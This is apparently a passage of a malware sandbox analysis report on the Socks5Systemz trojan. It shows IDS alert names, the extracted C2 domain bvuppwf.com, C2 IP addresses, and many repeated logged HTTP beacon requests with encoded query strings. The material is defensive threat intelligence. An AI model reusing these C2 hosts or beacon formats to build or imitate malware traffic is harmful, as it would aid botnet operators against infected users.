        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49820 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49820 -> 45.142.214.240:80
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: bvuppwf.com
        Source: global trafficTCP traffic: 192.168.2.4:49737 -> 88.80.148.19:2023
        Source: Joe Sandbox ViewIP Address: 88.80.148.19 88.80.148.19
        Source: Joe Sandbox ViewIP Address: 45.142.214.240 45.142.214.240
        Source: Joe Sandbox ViewASN Name: ALEXHOSTMD ALEXHOSTMD
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ec909e3b HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
